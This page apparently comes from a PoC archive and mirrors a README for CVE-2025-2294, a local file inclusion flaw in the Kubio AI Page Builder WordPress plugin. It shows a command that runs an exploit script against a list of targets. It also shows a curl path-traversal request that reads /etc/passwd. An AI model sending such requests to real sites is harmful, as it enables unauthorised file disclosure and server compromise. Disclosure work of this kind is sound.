Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2025-2294 PoC — Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

Source
Associated Vulnerability
Title:Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion (CVE-2025-2294)
Description:The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Readme
# CVE-2025-2294

# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱

## 🔍 Overview

**CVE-2025-2294** is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** 👾 to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.

Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.

## 👤 Author

**Muhammad Nizar** — Security Researcher 🔐  
GitHub: [0xWhoami35](https://github.com/0xWhoami35)    
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▶️

---

*Feel free to reach out for questions or collaboration! 🤝*

---

## 📋 Affected Versions

- Kubio AI Page Builder plugin ≤ 2.5.1 🛠️

---

## 🧰 Usage

Run the exploit script with a list of target URLs:

```bash
python3 lfi.py -l list.txt
```

## ⚠️ Vulnerability Details

- **Type:** Local File Inclusion (LFI) 🕳️  
- **Severity:** Critical (CVSS 9.8) 🔥  
- **Attack Vector:** Remote, unauthenticated 🌐  
- **Impact:** Confidentiality, Integrity, Availability 🔐  

---

## 🧪 Proof of Concept (PoC)

```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →